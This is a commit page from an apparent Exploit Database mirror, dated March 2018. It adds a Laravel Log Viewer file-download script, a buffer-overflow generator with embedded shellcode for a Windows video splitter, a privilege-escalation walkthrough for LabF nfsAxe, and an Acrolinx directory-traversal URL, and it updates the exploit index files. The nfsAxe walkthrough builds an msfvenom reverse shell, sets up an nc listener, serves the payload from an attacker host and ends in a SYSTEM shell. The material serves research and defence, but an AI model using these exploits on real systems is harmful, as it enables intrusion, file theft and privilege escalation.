bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-03-27

Browse source 
4 changes to exploits/shellcodes

Crashmail 1.6 - Stack-Based Buffer Overflow ( ROP execve )
Crashmail 1.6 - Stack-Based Buffer Overflow (ROP)
Fast AVI MPEG Splitter 1.2 - Stack-Based Buffer Overflow
LabF nfsAxe 3.7 - Privilege Escalation

Acrolinx Server < 5.2.5 - Directory Traversal

Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 - 170109) - Access Control Bypass
Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass

Laravel Log Viewer < 0.13.0 - Local File Download

Linux/x86 - EggHunter Shellcode (11 Bytes)
Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)
This commit is contained in:
Offensive Security 2018-03-27 05:01:50 +00:00
parent e3fb91f1d7
commit 285f79e70e
6 changed files with 188 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

53
exploits/php/webapps/44343.py Executable file
View file

@ -0,0 +1,53 @@
# Exploit Title: Laravel log viewer by rap2hpoutre local file download (LFD)
# Date: 23/02/2018
# Exploit Author: Haboob Team
# Software Link: https://github.com/rap2hpoutre/laravel-log-viewer/tree/v0.11.1
# Version: v0.12.0 and below
# CVE : CVE-2018-8947
1. Description
Unauthorized user can access Laravel log viewer by rap2hpoutre and use download function to download any file with laravel permission, by base64 encode the wanted file.
2. Proof of Concept
#After providing the url of the vulnerable laravel log viewer by rap2hpoutre (with / in the end or you can edit it yourself), and the file wanted including "../" the script will create a folder and save the downloaded file there
import os
import base64
from urllib2 import urlopen, URLError, HTTPError
import argparse
import cookielib
parser = argparse.ArgumentParser(description='_0_ Laravel 0Day _0_')
parser.add_argument("-u", action="store", dest="url", help="Target URL", required=True)
parser.add_argument("-f", action="store", dest="file", help="Target File", required=True)
args = parser.parse_args()
url = str(args.url).strip()+"/logs/?dl="
final_file= args.file
if not os.path.exists("./0Grats0"):
os.makedirs("./0Grats0")
word = str(args.file).split('/')
word1= "./0Grats0/"+word[-1]
finalee=url+base64.b64encode(final_file)
try:
f = urlopen(finalee)
with open(word1, "wb") as local_file:
local_file.write(f.read())
except HTTPError, e:
print "HTTP Error:", e.code, finalee
except URLError, e:
print "URL Error:", e.reason, finalee
3. Solution:
Update to version v0.13.0
https://github.com/rap2hpoutre/laravel-log-viewer/releases/tag/v0.13.0

58
exploits/windows/local/44341.py Executable file
View file

@ -0,0 +1,58 @@
# SWAMI KARUPASAMI THUNAI
#
###############################################################################
# Exploit Title: Stack Based Buffer Overflow in Allok Fast AVI MPEG Splitter 1.2 (Windows XP SP3)
# Date: 06-03-2018
# Exploit Author: Mohan Ravichandran & Velayutham Selvaraj
# Organization : TwinTech Solutions
# Vulnerable Software: Allok Fast AVI MPEG Splitter 1.2
# Vendor Homepage: http://www.alloksoft.com
# Version: 1.2
# Software Link: http://www.alloksoft.com/allok_vconverter.exe
# Tested On: Windows XP Service Pack 3 (Version 2002) & windows 7 x64 Ultimate
#
# Credit to Velayutham Selvaraj for discovering the Vulnerbility
# Vulnerability Disclosure Date : 2018-03-06
#
# Manual steps to reproduce the vulnerability ...
#1. Download and install the "setup(allok_fast_avimpegsplitter.exe)" file
#2. Run this exploit code via python 2.7
#3. A file "exploit.txt" will be created
#4. Copy the contents of the file and paste in the License Name field
# Name > exploit.txt
#5. Type some random character in License Code
#6. Click Register and voila !
#7. Boom calculator opens
#
##############################################################################
import struct
file = open("exploit.txt","wb")
buflen = 4000
junk = "A" * 780
nseh = "\x90\x90\xeb\x10"
seh = struct.pack("<L",0x10019A09)
nops = "\x90" * 20
# The below shellcode will open calculator, but can be modified by need.
shellcode = ""
shellcode +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
shellcode +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
shellcode +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
shellcode +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
shellcode +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
shellcode +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
shellcode +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
shellcode +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
shellcode +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
shellcode +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
shellcode +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
shellcode +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
shellcode +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
shellcode +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
shellcode +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
shellcode +="\xc4\xd9"
exploit = junk + nseh + seh + nops + shellcode
fillers = buflen - len(exploit)
buf = exploit + "D" * fillers
file.write(buf)
file.close()

55
exploits/windows/local/44342.txt Normal file
View file

@ -0,0 +1,55 @@
Exploit Author: bzyo
Twitter: @bzyo_
Exploit Title: LabF nfsAxe 3.7 - Privilege Escalation
Date: 03-24-2018
Vulnerable Software: LabF nfsAxe 3.7
Vendor Homepage: http://www.labf.com/
Version: 3.7
Software Link: http://www.labf.com/download/nfsaxe.exe
Tested On: Windows 7 x86 and x64 *Requires Windows 7 Public Sharing to be enabled
Details:
By default LabF nfsAxe 3.7 installs to "C:\Users\Public\Program Files\LabF.com\nfsAxe" and installs
a service called "XwpXSetSrvnfsAxe service". To start this service an executable "xsetsrv.exe"
is located in the same directory and also runs under Local System.
By default in Windows with Public Folder sharing enabled, the permissions on any file/folder under "C:\Users\Public\" is Full Control
for Everyone. This means unprivileged users have the ability to add, delete, or modify any and all
files/folders.
Exploit:
1. Generate malicious .exe on attacking machine
msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=192.168.0.149 LPORT=443 -f exe > /var/www/html/xsetsrv.exe
2. Setup listener and start apache on attacking machine
nc -nlvvp 443
service apache2 start
3. Download malicious .exe on victim machine
Open browser to http://192.168.0.149/xsetsrv.exe and download
4. Rename C:\Users\Public\Program Files\LabF.com\nfsAxe\xsetsrv.exe
xsetsrv.exe > xsetsrv.bak
5. Copy/Move downloaded xsetsrv.exe file to C:\Users\Public\Program Files\LabF.com\nfsAxe\
6. Restart victim machine and login as unprivileged user
7. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system
Prerequisites:
To successfully exploit this vulnerability, an attacker must already have access
to a system running a LabF nfsAxe installed at the default location using a
low-privileged user account
Risk:
The vulnerability allows local attackers to escalate privileges and execute
arbitrary code as Local System aka Game Over.
Fix:
Don't use default install path

15
exploits/windows/remote/44345.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Acrolinx Dashboard Directory Traversal
# CVE: CVE 2018-7719
# Date: 19.02.2017
# Exploit Author: Berk Dusunur
# Vendor Homepage: www.acrolinx.com
# Version:Before 5.2.5
PoC
Acrolinx dashboard windows works on the server.
http://localhost/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
http://www.berkdusunur.net/2018/03/tr-en-acrolinx-dashboard-directory.html

8
files_exploits.csv
View file

@ -9616,8 +9616,10 @@ id,file,description,date,author,type,platform,port
44315,exploits/windows/local/44315.txt,"Microsoft Windows - Desktop Bridge Virtual Registry NtLoadKey Arbitrary File Read/Write Privilege Escalation",2018-03-20,"Google Security Research",local,windows,
44325,exploits/linux/local/44325.c,"Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak",2018-03-22,"Gregory Draperi",local,linux,
44330,exploits/windows/local/44330.py,"Allok Quicktime to AVI MPEG DVD Converter 4.6.1217 - Stack-Based Buffer Overflow",2018-03-23,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
44331,exploits/linux/local/44331.py,"Crashmail 1.6 - Stack-Based Buffer Overflow ( ROP execve )",2018-03-23,"Juan Sacco",local,linux,
44331,exploits/linux/local/44331.py,"Crashmail 1.6 - Stack-Based Buffer Overflow (ROP)",2018-03-23,"Juan Sacco",local,linux,
44337,exploits/windows/local/44337.py,"Easy CD DVD Copy 1.3.24 - Local Buffer Overflow (SEH)",2018-03-23,"Hashim Jawad",local,windows,
44341,exploits/windows/local/44341.py,"Fast AVI MPEG Splitter 1.2 - Stack-Based Buffer Overflow",2018-03-26,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
44342,exploits/windows/local/44342.txt,"LabF nfsAxe 3.7 - Privilege Escalation",2018-03-26,bzyo,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16357,6 +16359,7 @@ id,file,description,date,author,type,platform,port
44292,exploits/windows/remote/44292.py,"SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution",2018-03-14,"erp scan team",remote,windows,
44293,exploits/windows/remote/44293.html,"Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
44294,exploits/windows/remote/44294.html,"Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution",2018-03-16,Rh0,remote,windows,
44345,exploits/windows/remote/44345.txt,"Acrolinx Server < 5.2.5 - Directory Traversal",2018-03-26,"Berk Dusunur",remote,windows,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39039,8 +39042,9 @@ id,file,description,date,author,type,platform,port
44317,exploits/hardware/webapps/44317.py,"Intelbras Telefone IP TIP200 LITE - Local File Disclosure",2018-03-20,anhax0r,webapps,hardware,
44318,exploits/php/webapps/44318.txt,"Vehicle Sales Management System - Multiple Vulnerabilities",2018-03-20,Sing,webapps,php,
44324,exploits/multiple/webapps/44324.py,"Cisco node-jos < 0.11.0 - Re-sign Tokens",2018-03-20,zioBlack,webapps,multiple,
44328,exploits/xml/webapps/44328.py,"Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 - 170109) - Access Control Bypass",2018-03-23,Matamorphosis,webapps,xml,
44328,exploits/xml/webapps/44328.py,"Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass",2018-03-23,Matamorphosis,webapps,xml,
44335,exploits/hardware/webapps/44335.js,"TL-WR720N 150Mbps Wireless N Router - Cross-Site Request Forgery",2018-03-23,"Mans van Someren",webapps,hardware,
44336,exploits/php/webapps/44336.py,"XenForo 2 - CSS Loader Denial of Service",2018-03-23,LockedByte,webapps,php,
44339,exploits/php/webapps/44339.txt,"MyBB Plugin Last User's Threads in Profile Plugin 1.2 - Persistent Cross-Site Scripting",2018-03-23,0xB9,webapps,php,
44340,exploits/php/webapps/44340.txt,"Wordpress Plugin Site Editor 1.1.1 - Local File Inclusion",2018-03-23,"Nicolas Buzy-Debat",webapps,php,80
44343,exploits/php/webapps/44343.py,"Laravel Log Viewer < 0.13.0 - Local File Download",2018-03-26,"Haboob Team",webapps,php,

Can't render this file because it is too large.

2
files_shellcodes.csv
View file

@ -872,4 +872,4 @@ id,file,description,date,author,type,platform
42992,shellcodes/windows_x86-64/42992.c,"Windows/x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
43463,shellcodes/linux_x86/43463.nasm,"Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes)",2018-01-04,"Hashim Jawad",shellcode,linux_x86
44321,shellcodes/linux_x86/44321.c,"Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)",2018-03-20,"Anurag Srivastava",shellcode,linux_x86
44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86
44334,shellcodes/linux_x86/44334.c,"Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)",2018-03-23,"Anurag Srivastava",shellcode,linux_x86

1 id file description date author type platform
872 42992 shellcodes/windows_x86-64/42992.c Windows/x64 - API Hooking Shellcode (117 bytes) 2017-10-16 Roziul Hasan Khan Shifat shellcode windows_x86-64
873 43463 shellcodes/linux_x86/43463.nasm Linux/x86 - chmod 777 /etc/sudoers Shellcode (36 bytes) 2018-01-04 Hashim Jawad shellcode linux_x86
874 44321 shellcodes/linux_x86/44321.c Linux/x86 - execve(/bin/sh) Shellcode (18 bytes) 2018-03-20 Anurag Srivastava shellcode linux_x86
875 44334 shellcodes/linux_x86/44334.c Linux/x86 - EggHunter Shellcode (11 Bytes) Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes) 2018-03-23 Anurag Srivastava shellcode linux_x86